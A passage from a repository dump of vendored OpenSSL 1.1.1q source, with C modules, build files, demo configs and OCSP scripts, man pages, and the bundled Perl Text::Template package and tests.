Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "crypto/store.h" 12 | #include "store_local.h" 13 | 14 | static CRYPTO_ONCE store_init = CRYPTO_ONCE_STATIC_INIT; 15 | DEFINE_RUN_ONCE_STATIC(do_store_init) 16 | { 17 | return OPENSSL_init_crypto(0, NULL) 18 | && ossl_store_file_loader_init(); 19 | } 20 | 21 | int ossl_store_init_once(void) 22 | { 23 | if (!RUN_ONCE(&store_init, do_store_init)) { 24 | OSSL_STOREerr(OSSL_STORE_F_OSSL_STORE_INIT_ONCE, ERR_R_MALLOC_FAILURE); 25 | return 0; 26 | } 27 | return 1; 28 | } 29 | 30 | void ossl_store_cleanup_int(void) 31 | { 32 | ossl_store_destroy_loaders_int(); 33 | } 34 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/store/store_strings.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2017 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | static char *type_strings[] = { 13 | "Name", /* OSSL_STORE_INFO_NAME */ 14 | "Parameters", /* OSSL_STORE_INFO_PARAMS */ 15 | "Pkey", /* OSSL_STORE_INFO_PKEY */ 16 | "Certificate", /* OSSL_STORE_INFO_CERT */ 17 | "CRL" /* OSSL_STORE_INFO_CRL */ 18 | }; 19 | 20 | const char *OSSL_STORE_INFO_type_string(int type) 21 | { 22 | int types = sizeof(type_strings) / sizeof(type_strings[0]); 23 | 24 | if (type < 1 || type > types) 25 | return NULL; 26 | 27 | return type_strings[type - 1]; 28 | } 29 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ts/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | ts_err.c ts_req_utils.c ts_req_print.c ts_rsp_utils.c ts_rsp_print.c \ 4 | ts_rsp_sign.c ts_rsp_verify.c ts_verify_ctx.c ts_lib.c ts_conf.c \ 5 | ts_asn1.c 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/txt_db/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=txt_db.c 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ui/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | ui_err.c ui_lib.c ui_openssl.c ui_null.c ui_util.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ui/ui_null.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2017 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "ui_local.h" 11 | 12 | static const UI_METHOD ui_null = { 13 | "OpenSSL NULL UI", 14 | NULL, /* opener */ 15 | NULL, /* writer */ 16 | NULL, /* flusher */ 17 | NULL, /* reader */ 18 | NULL, /* closer */ 19 | NULL 20 | }; 21 | 22 | /* The method with all the built-in thingies */ 23 | const UI_METHOD *UI_null(void) 24 | { 25 | return &ui_null; 26 | } 27 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/whrlpool/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=wp_dgst.c {- $target{wp_asm_src} -} 3 | 4 | GENERATE[wp-mmx.s]=asm/wp-mmx.pl \ 5 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) $(PROCESSOR) 6 | DEPEND[wp-mmx.s]=../perlasm/x86asm.pl 7 | 8 | GENERATE[wp-x86_64.s]=asm/wp-x86_64.pl $(PERLASM_SCHEME) 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/whrlpool/wp_local.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2005-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | void whirlpool_block(WHIRLPOOL_CTX *, const void *, size_t); 13 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/x509/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | x509_def.c x509_d2.c x509_r2x.c x509_cmp.c \ 4 | x509_obj.c x509_req.c x509spki.c x509_vfy.c \ 5 | x509_set.c x509cset.c x509rset.c x509_err.c \ 6 | x509name.c x509_v3.c x509_ext.c x509_att.c \ 7 | x509type.c x509_meth.c x509_lu.c x_all.c x509_txt.c \ 8 | x509_trs.c by_file.c by_dir.c x509_vpm.c \ 9 | x_crl.c t_crl.c x_req.c t_req.c x_x509.c t_x509.c \ 10 | x_pubkey.c x_x509a.c x_attrib.c x_exten.c x_name.c 11 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/x509v3/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | v3_bcons.c v3_bitst.c v3_conf.c v3_extku.c v3_ia5.c v3_lib.c \ 4 | v3_prn.c v3_utl.c v3err.c v3_genn.c v3_alt.c v3_skey.c v3_akey.c v3_pku.c \ 5 | v3_int.c v3_enum.c v3_sxnet.c v3_cpols.c v3_crld.c v3_purp.c v3_info.c \ 6 | v3_akeya.c v3_pmaps.c v3_pcons.c v3_ncons.c v3_pcia.c v3_pci.c \ 7 | pcy_cache.c pcy_node.c pcy_data.c pcy_map.c pcy_tree.c pcy_lib.c \ 8 | v3_asid.c v3_addr.c v3_tlsf.c v3_admis.c 9 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/x509v3/v3_akeya.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2001-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | ASN1_SEQUENCE(AUTHORITY_KEYID) = { 18 | ASN1_IMP_OPT(AUTHORITY_KEYID, keyid, ASN1_OCTET_STRING, 0), 19 | ASN1_IMP_SEQUENCE_OF_OPT(AUTHORITY_KEYID, issuer, GENERAL_NAME, 1), 20 | ASN1_IMP_OPT(AUTHORITY_KEYID, serial, ASN1_INTEGER, 2) 21 | } ASN1_SEQUENCE_END(AUTHORITY_KEYID) 22 | 23 | IMPLEMENT_ASN1_FUNCTIONS(AUTHORITY_KEYID) 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/README: -------------------------------------------------------------------------------- 1 | NOTE: Don't expect any of these programs to work with current 2 | OpenSSL releases, or even with later SSLeay releases. 3 | 4 | Original README: 5 | ============================================================================= 6 | 7 | Some demo programs sent to me by various people 8 | 9 | eric 10 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/bio/README: -------------------------------------------------------------------------------- 1 | This directory contains some simple examples of the use of BIO's 2 | to simplify socket programming. 3 | 4 | The client-conf, server-conf, client-arg and client-conf include examples 5 | of how to use the SSL_CONF API for configuration file or command line 6 | processing. 7 | 8 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/bio/accept.cnf: -------------------------------------------------------------------------------- 1 | # Example configuration file 2 | # Port to listen on 3 | Port = 4433 4 | # Disable TLS v1.2 for test. 5 | # Protocol = ALL, -TLSv1.2 6 | # Only support 3 curves 7 | Curves = P-521:P-384:P-256 8 | # Restricted signature algorithms 9 | SignatureAlgorithms = RSA+SHA512:ECDSA+SHA512 10 | Certificate=server.pem 11 | PrivateKey=server.pem 12 | ChainCAFile=root.pem 13 | VerifyCAFile=root.pem 14 | 15 | # Request certificate 16 | VerifyMode=Request 17 | ClientCAFile=root.pem 18 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/bio/cmod.cnf: -------------------------------------------------------------------------------- 1 | # Example config module configuration 2 | 3 | # Name supplied by application to CONF_modules_load_file 4 | # and section containing configuration 5 | testapp = test_sect 6 | 7 | [test_sect] 8 | # list of configuration modules 9 | 10 | # SSL configuration module 11 | ssl_conf = ssl_sect 12 | 13 | [ssl_sect] 14 | # list of SSL configurations 15 | server = server_sect 16 | 17 | [server_sect] 18 | # Only support 3 curves 19 | Curves = P-521:P-384:P-256 20 | # Restricted signature algorithms 21 | SignatureAlgorithms = RSA+SHA512:ECDSA+SHA512 22 | # Certificates and keys 23 | RSA.Certificate=server.pem 24 | ECDSA.Certificate=server-ec.pem 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/bio/connect.cnf: -------------------------------------------------------------------------------- 1 | # Example configuration file 2 | # Connects to the default port of s_server 3 | Connect = localhost:4433 4 | # Disable TLS v1.2 for test. 5 | # Protocol = ALL, -TLSv1.2 6 | # Only support 3 curves 7 | Curves = P-521:P-384:P-256 8 | # Restricted signature algorithms 9 | SignatureAlgorithms = RSA+SHA512:ECDSA+SHA512 10 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/bio/server-ec.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgsoKOpzTm/+VR5xOk 3 | kgwtljzMFYtX4NGdqCkxjitXvLmhRANCAASsxTC21z8mDYAX/RgLK5XGJNmPlHcY 4 | VMql6fSeS+9fTZnn1Ma12932/UBfFTITOuHviJYkQ5KxVSitmgMwnF3V 5 | -----END PRIVATE KEY----- 6 | -----BEGIN CERTIFICATE----- 7 | MIIBvjCCAWSgAwIBAgIURVOfyUojPPQMfDEVhKY4DIdeLY0wCgYIKoZIzj0EAwIw 8 | NTEfMB0GA1UECwwWVGVzdCBFQ0RTQSBDZXJ0aWZpY2F0ZTESMBAGA1UEAwwJbG9j 9 | YWxob3N0MCAXDTE4MDYxNDEyNDYyOFoYDzIxMTgwNjE0MTI0NjI4WjA1MR8wHQYD 10 | VQQLDBZUZXN0IEVDRFNBIENlcnRpZmljYXRlMRIwEAYDVQQDDAlsb2NhbGhvc3Qw 11 | WTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASsxTC21z8mDYAX/RgLK5XGJNmPlHcY 12 | VMql6fSeS+9fTZnn1Ma12932/UBfFTITOuHviJYkQ5KxVSitmgMwnF3Vo1AwTjAd 13 | BgNVHQ4EFgQUA0dWehTLHzBYhzfXiTIVUOXDusMwHwYDVR0jBBgwFoAUA0dWehTL 14 | HzBYhzfXiTIVUOXDusMwDAYDVR0TBAUwAwEB/zAKBggqhkjOPQQDAgNIADBFAiEA 15 | 8/l8RyihzqlEnLjcyIEaXTZm4HyNgZRQKhNACCW3jd4CIEbMJAf/D0eY38EeP2xY 16 | /BDy/BYXYmyDQeqiE+RDjG5X 17 | -----END CERTIFICATE----- 18 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/bio/shared.opt: -------------------------------------------------------------------------------- 1 | OSSL$LIBSSL_SHR/SHARE 2 | OSSL$LIBCRYPTO_SHR/SHARE 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/bio/static.opt: -------------------------------------------------------------------------------- 1 | OSSL$LIBSSL/LIB 2 | OSSL$LIBCRYPTO/LIB 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/certs/README: -------------------------------------------------------------------------------- 1 | There is often a need to generate test certificates automatically using 2 | a script. This is often a cause for confusion which can result in incorrect 3 | CA certificates, obsolete V1 certificates or duplicate serial numbers. 4 | The range of command line options can be daunting for a beginner. 5 | 6 | The mkcerts.sh script is an example of how to generate certificates 7 | automatically using scripts. Example creates a root CA, an intermediate CA 8 | signed by the root and several certificates signed by the intermediate CA. 9 | 10 | The script then creates an empty index.txt file and adds entries for the 11 | certificates and generates a CRL. Then one certificate is revoked and a 12 | second CRL generated. 13 | 14 | The script ocsprun.sh runs the test responder on port 8888 covering the 15 | client certificates. 16 | 17 | The script ocspquery.sh queries the status of the certificates using the 18 | test responder. 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/certs/ocspquery.sh: -------------------------------------------------------------------------------- 1 | # Example querying OpenSSL test responder. Assumes ocsprun.sh has been 2 | # called. 3 | 4 | OPENSSL=../../apps/openssl 5 | OPENSSL_CONF=../../apps/openssl.cnf 6 | export OPENSSL_CONF 7 | 8 | # Send responder queries for each certificate. 9 | 10 | echo "Requesting OCSP status for each certificate" 11 | $OPENSSL ocsp -issuer intca.pem -cert client.pem -CAfile root.pem \ 12 | -url http://127.0.0.1:8888/ 13 | $OPENSSL ocsp -issuer intca.pem -cert server.pem -CAfile root.pem \ 14 | -url http://127.0.0.1:8888/ 15 | $OPENSSL ocsp -issuer intca.pem -cert rev.pem -CAfile root.pem \ 16 | -url http://127.0.0.1:8888/ 17 | # One query for all three certificates. 18 | echo "Requesting OCSP status for three certificates in one request" 19 | $OPENSSL ocsp -issuer intca.pem \ 20 | -cert client.pem -cert server.pem -cert rev.pem \ 21 | -CAfile root.pem -url http://127.0.0.1:8888/ 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/certs/ocsprun.sh: -------------------------------------------------------------------------------- 1 | # Example of running an querying OpenSSL test OCSP responder. 2 | # This assumes "mkcerts.sh" or similar has been run to set up the 3 | # necessary file structure. 4 | 5 | OPENSSL=../../apps/openssl 6 | OPENSSL_CONF=../../apps/openssl.cnf 7 | export OPENSSL_CONF 8 | 9 | # Run OCSP responder. 10 | 11 | PORT=8888 12 | 13 | $OPENSSL ocsp -port $PORT -index index.txt -CA intca.pem \ 14 | -rsigner resp.pem -rkey respkey.pem -rother intca.pem $* 15 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/demos/evp/Makefile: -------------------------------------------------------------------------------- 1 | # Quick instruction: 2 | # To build against an OpenSSL built in the source tree, do this: 3 | # 4 | # make OPENSSL_INCS_LOCATION=-I../../include OPENSSL_LIBS_LOCATION=-L../.. 5 | # 6 | # To run the demos when linked with a shared library (default): 7 | # 8 | # LD_LIBRARY_PATH=../.. ./aesccm 9 | # LD_LIBRARY_PATH=../.. ./aesgcm 10 | 11 | CFLAGS = $(OPENSSL_INCS_LOCATION) 12 | LDFLAGS = $(OPENSSL_LIBS_LOCATION) -lssl -lcrypto 13 | 14 | all: aesccm aesgcm 15 | 16 | aesccm: aesccm.o 17 | aesgcm: aesgcm.o 18 | 19 | aesccm aesgcm: 20 | $(CC) $(CFLAGS) -o $@ $< $(LDFLAGS) 21 | 22 | clean: 23 | $(RM) aesccm aesgcm *.o 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/doc/README: -------------------------------------------------------------------------------- 1 | 2 | README This file 3 | 4 | fingerprints.txt 5 | PGP fingerprints of authorised release signers 6 | 7 | standards.txt 8 | Moved to the web, https://www.openssl.org/docs/standards.html 9 | 10 | HOWTO/ 11 | A few how-to documents; not necessarily up-to-date 12 | 13 | man1/ 14 | The openssl command-line tools; start with openssl.pod 15 | 16 | man3/ 17 | The SSL library and the crypto library 18 | 19 | man5/ 20 | File formats 21 | 22 | man7/ 23 | Overviews; start with crypto.pod and ssl.pod, for example 24 | Algorithm specific EVP_PKEY documentation. 25 | 26 | Formatted versions of the manpages (apps,ssl,crypto) can be found at 27 | https://www.openssl.org/docs/manpages.html 28 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/doc/dir-locals.example.el: -------------------------------------------------------------------------------- 1 | ;;; This is an example of what a .dir-locals.el suitable for OpenSSL 2 | ;;; development could look like. 3 | ;;; 4 | ;;; Apart from setting the CC mode style to "OpenSSL-II", it also 5 | ;;; makes sure that tabs are never used for indentation in any file, 6 | ;;; and that the fill column is 78. 7 | ;;; 8 | ;;; For more information see (info "(emacs) Directory Variables") 9 | 10 | ((nil 11 | (indent-tabs-mode . nil) 12 | (fill-column . 70) 13 | ) 14 | (c-mode 15 | (c-file-style . "OpenSSL-II"))) 16 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/doc/man3/BN_swap.pod: -------------------------------------------------------------------------------- 1 | =pod 2 | 3 | =head1 NAME 4 | 5 | BN_swap - exchange BIGNUMs 6 | 7 | =head1 SYNOPSIS 8 | 9 | #include 10 | 11 | void BN_swap(BIGNUM *a, BIGNUM *b); 12 | 13 | =head1 DESCRIPTION 14 | 15 | BN_swap() exchanges the values of I and I. 16 | 17 | =head1 RETURN VALUES 18 | 19 | BN_swap() does not return a value. 20 | 21 | =head1 COPYRIGHT 22 | 23 | Copyright 2000-2018 The OpenSSL Project Authors. All Rights Reserved. 24 | 25 | Licensed under the OpenSSL license (the "License"). You may not use 26 | this file except in compliance with the License. You can obtain a copy 27 | in the file LICENSE in the source distribution or at 28 | L. 29 | 30 | =cut 31 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/doc/man3/ERR_clear_error.pod: -------------------------------------------------------------------------------- 1 | =pod 2 | 3 | =head1 NAME 4 | 5 | ERR_clear_error - clear the error queue 6 | 7 | =head1 SYNOPSIS 8 | 9 | #include 10 | 11 | void ERR_clear_error(void); 12 | 13 | =head1 DESCRIPTION 14 | 15 | ERR_clear_error() empties the current thread's error queue. 16 | 17 | =head1 RETURN VALUES 18 | 19 | ERR_clear_error() has no return value. 20 | 21 | =head1 SEE ALSO 22 | 23 | L 24 | 25 | =head1 COPYRIGHT 26 | 27 | Copyright 2000-2017 The OpenSSL Project Authors. All Rights Reserved. 28 | 29 | Licensed under the OpenSSL license (the "License"). You may not use 30 | this file except in compliance with the License. You can obtain a copy 31 | in the file LICENSE in the source distribution or at 32 | L. 33 | 34 | =cut 35 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/doc/man3/SSL_get_SSL_CTX.pod: -------------------------------------------------------------------------------- 1 | =pod 2 | 3 | =head1 NAME 4 | 5 | SSL_get_SSL_CTX - get the SSL_CTX from which an SSL is created 6 | 7 | =head1 SYNOPSIS 8 | 9 | #include 10 | 11 | SSL_CTX *SSL_get_SSL_CTX(const SSL *ssl); 12 | 13 | =head1 DESCRIPTION 14 | 15 | SSL_get_SSL_CTX() returns a pointer to the SSL_CTX object, from which 16 | B was created with L. 17 | 18 | =head1 RETURN VALUES 19 | 20 | The pointer to the SSL_CTX object is returned. 21 | 22 | =head1 SEE ALSO 23 | 24 | L, L 25 | 26 | =head1 COPYRIGHT 27 | 28 | Copyright 2001-2016 The OpenSSL Project Authors. All Rights Reserved. 29 | 30 | Licensed under the OpenSSL license (the "License"). You may not use 31 | this file except in compliance with the License. You can obtain a copy 32 | in the file LICENSE in the source distribution or at 33 | L. 34 | 35 | =cut 36 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/engines/e_afalg.ec: -------------------------------------------------------------------------------- 1 | # The INPUT HEADER is scanned for declarations 2 | # LIBNAME INPUT HEADER ERROR-TABLE FILE 3 | L AFALG e_afalg_err.h e_afalg_err.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/engines/e_capi.ec: -------------------------------------------------------------------------------- 1 | # The INPUT HEADER is scanned for declarations 2 | # LIBNAME INPUT HEADER ERROR-TABLE FILE 3 | L CAPI e_capi_err.h e_capi_err.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/engines/e_dasync.ec: -------------------------------------------------------------------------------- 1 | # The INPUT HEADER is scanned for declarations 2 | # LIBNAME INPUT HEADER ERROR-TABLE FILE 3 | L DASYNC e_dasync_err.h e_dasync_err.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/engines/e_ossltest.ec: -------------------------------------------------------------------------------- 1 | # The INPUT HEADER is scanned for declarations 2 | # LIBNAME INPUT HEADER ERROR-TABLE FILE 3 | L OSSLTEST e_ossltest_err.h e_ossltest_err.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/engines/e_ossltest_err.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Generated by util/mkerr.pl DO NOT EDIT 3 | * Copyright 1995-2017 The OpenSSL Project Authors. All Rights Reserved. 4 | * 5 | * Licensed under the OpenSSL license (the "License"). You may not use 6 | * this file except in compliance with the License. You can obtain a copy 7 | * in the file LICENSE in the source distribution or at 8 | * https://www.openssl.org/source/license.html 9 | */ 10 | 11 | #ifndef OSSL_ENGINES_E_OSSLTEST_ERR_H 12 | # define OSSL_ENGINES_E_OSSLTEST_ERR_H 13 | 14 | # define OSSLTESTerr(f, r) ERR_OSSLTEST_error((f), (r), OPENSSL_FILE, OPENSSL_LINE) 15 | 16 | 17 | /* 18 | * OSSLTEST function codes. 19 | */ 20 | # define OSSLTEST_F_BIND_OSSLTEST 100 21 | # define OSSLTEST_F_OSSLTEST_AES128_INIT_KEY 101 22 | 23 | /* 24 | * OSSLTEST reason codes. 25 | */ 26 | # define OSSLTEST_R_INIT_FAILED 100 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/Text-Template-1.46/INSTALL: -------------------------------------------------------------------------------- 1 | 2 | To install: 3 | 4 | perl Makefile.PL 5 | 6 | to construct the Makefile, then 7 | 8 | make test 9 | 10 | to test the package. If it fails any tests, please send me the output 11 | of `make test' and `perl -V'. I'll tell you whether it is safe to go 12 | ahead, or I'll provide a fix. 13 | 14 | If it passes the tests, use 15 | 16 | make install 17 | 18 | to install it. 19 | 20 | Detailed documentation is at the bottom of the lib/Text/Template.pm 21 | file. You may be able to view it with the following command: 22 | 23 | perldoc Text::Template 24 | 25 | Or: 26 | 27 | perldoc lib/Text/Template.pm 28 | 29 | If you have problems, send me mail: 30 | 31 | mjd-perl-template+@plover.com 32 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/Text-Template-1.46/MANIFEST: -------------------------------------------------------------------------------- 1 | MANIFEST 2 | COPYING 3 | Artistic 4 | Makefile.PL 5 | INSTALL 6 | README 7 | lib/Text/Template.pm 8 | lib/Text/Template/Preprocess.pm 9 | t/00-version.t 10 | t/01-basic.t 11 | t/02-hash.t 12 | t/03-out.t 13 | t/04-safe.t 14 | t/05-safe2.t 15 | t/06-ofh.t 16 | t/07-safe3.t 17 | t/08-exported.t 18 | t/09-error.t 19 | t/10-delimiters.t 20 | t/11-prepend.t 21 | t/12-preprocess.t 22 | t/13-taint.t 23 | t/14-broken.t 24 | META.yml Module meta-data (added by MakeMaker) 25 | META.json Module JSON meta-data (added by MakeMaker) 26 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/Text-Template-1.46/META.json: -------------------------------------------------------------------------------- 1 | { 2 | "abstract" : "unknown", 3 | "author" : [ 4 | "unknown" 5 | ], 6 | "dynamic_config" : 1, 7 | "generated_by" : "ExtUtils::MakeMaker version 6.62, CPAN::Meta::Converter version 2.120630", 8 | "license" : [ 9 | "unknown" 10 | ], 11 | "meta-spec" : { 12 | "url" : "http://search.cpan.org/perldoc?CPAN::Meta::Spec", 13 | "version" : "2" 14 | }, 15 | "name" : "Text-Template", 16 | "no_index" : { 17 | "directory" : [ 18 | "t", 19 | "inc" 20 | ] 21 | }, 22 | "prereqs" : { 23 | "build" : { 24 | "requires" : { 25 | "ExtUtils::MakeMaker" : "0" 26 | } 27 | }, 28 | "configure" : { 29 | "requires" : { 30 | "ExtUtils::MakeMaker" : "0" 31 | } 32 | }, 33 | "runtime" : { 34 | "requires" : {} 35 | } 36 | }, 37 | "release_status" : "stable", 38 | "version" : "1.46" 39 | } 40 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/Text-Template-1.46/META.yml: -------------------------------------------------------------------------------- 1 | --- 2 | abstract: unknown 3 | author: 4 | - unknown 5 | build_requires: 6 | ExtUtils::MakeMaker: 0 7 | configure_requires: 8 | ExtUtils::MakeMaker: 0 9 | dynamic_config: 1 10 | generated_by: 'ExtUtils::MakeMaker version 6.62, CPAN::Meta::Converter version 2.120630' 11 | license: unknown 12 | meta-spec: 13 | url: http://module-build.sourceforge.net/META-spec-v1.4.html 14 | version: 1.4 15 | name: Text-Template 16 | no_index: 17 | directory: 18 | - t 19 | - inc 20 | requires: {} 21 | version: 1.46 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/Text-Template-1.46/Makefile.PL: -------------------------------------------------------------------------------- 1 | use ExtUtils::MakeMaker; 2 | WriteMakefile( 3 | NAME => 'Text::Template', 4 | VERSION_FROM => 'lib/Text/Template.pm', 5 | # 'linkext' => {LINKTYPE => ''}, 6 | 'dist' => {COMPRESS => 'gzip', SUFFIX => 'gz'}, 7 | ); 8 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/Text-Template-1.46/t/00-version.t: -------------------------------------------------------------------------------- 1 | #!perl 2 | 3 | use Text::Template; 4 | print "1..1\n"; 5 | 6 | if ($Text::Template::VERSION == 1.46) { 7 | print "ok 1\n"; 8 | } else { 9 | print "not ok 1\n"; 10 | } 11 | 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/Text-Template-1.46/t/06-ofh.t: -------------------------------------------------------------------------------- 1 | #!perl 2 | # 3 | # test apparatus for Text::Template module 4 | # still incomplete. 5 | 6 | use Text::Template; 7 | 8 | die "This is the test program for Text::Template version 1.46. 9 | You are using version $Text::Template::VERSION instead. 10 | That does not make sense.\n 11 | Aborting" 12 | unless $Text::Template::VERSION == 1.46; 13 | 14 | print "1..2\n"; 15 | 16 | $n=1; 17 | 18 | $template = new Text::Template TYPE => STRING, SOURCE => q{My process ID is {$$}}; 19 | $of = "t$$"; 20 | END { unlink $of } 21 | open O, "> $of" or die; 22 | 23 | $text = $template->fill_in(OUTPUT => \*O); 24 | 25 | # (1) No $text should have been constructed. Return value should be true. 26 | print +($text eq '1' ? '' : 'not '), "ok $n\n"; 27 | $n++; 28 | 29 | close O or die; 30 | open I, "< $of" or die; 31 | { local $/; $t = } 32 | close I; 33 | 34 | # (2) The text should have been printed to the file 35 | print +($t eq "My process ID is $$" ? '' : 'not '), "ok $n\n"; 36 | $n++; 37 | 38 | exit; 39 | 40 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/external/perl/transfer/Text/Template.pm: -------------------------------------------------------------------------------- 1 | # Copyright 2016-2018 The OpenSSL Project Authors. All Rights Reserved. 2 | # 3 | # Licensed under the OpenSSL license (the "License"). You may not use 4 | # this file except in compliance with the License. You can obtain a copy 5 | # in the file LICENSE in the source distribution or at 6 | # https://www.openssl.org/source/license.html 7 | 8 | # Quick transfer to the downloaded Text::Template 9 | 10 | package transfer::Text::Template; 11 | $VERSION = 1.46; 12 | 13 | BEGIN { 14 | use File::Spec::Functions; 15 | use File::Basename; 16 | use lib catdir(dirname(__FILE__), "..", "..", "Text-Template-1.46", "lib"); 17 | # Some unpackers on VMS convert periods in directory names to underscores 18 | use lib catdir(dirname(__FILE__), "..", "..", "Text-Template-1_46", "lib"); 19 | use Text::Template; 20 | shift @INC; # Takes away the effect of use lib 21 | shift @INC; # Takes away the effect of use lib 22 | } 23 | 1; 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/__DECC_INCLUDE_EPILOGUE.H: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* 11 | * This file is only used by HP C on VMS, and is included automatically 12 | * after each header file from this directory 13 | */ 14 | 15 | /* restore state. Must correspond to the save in __decc_include_prologue.h */ 16 | #pragma names restore 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/include/crypto/__DECC_INCLUDE_PROLOGUE.H: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license 